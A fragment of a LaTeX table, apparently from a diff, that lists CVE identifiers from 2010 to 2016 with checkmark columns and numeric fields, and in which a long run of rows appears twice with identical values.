& & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & 